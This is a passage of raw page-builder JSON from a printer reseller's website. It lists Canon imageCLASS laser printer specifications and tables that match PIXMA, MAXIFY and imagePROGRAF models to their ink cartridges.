MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p><\\/div><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Printing<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 43ppm<\\/li><li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li><li>FPOT: 6.2secs. (A4)<\\/li><li>Max. paper input capacity: Up to 2,300 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p><\\/div><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 38ppm<\\/li><li>Recommended monthly print volume: 750 - 4,000 pages<\\/li><li>FPOT: 5.5secs. (A4)<\\/li><li>Max. paper input capacity: Up to 900 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>imagePROGRAF PRO-500<\\/p><\\/td><td width=\\\"208\\\"><p>Maintenance Cartridge MC-20<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY iB4170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5070<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5370<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5470<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E3170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E410<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E4270<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E470<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E477<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E480<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E510<\\/p><\\/td><td width=\\\"208\\\"><p>CL-98 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-88 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560 \\/ E560R<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G2010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G4010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110 (with battery)<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP1300<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2770 \\/ iP2772<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2870S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP4200<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP7270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP8770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td 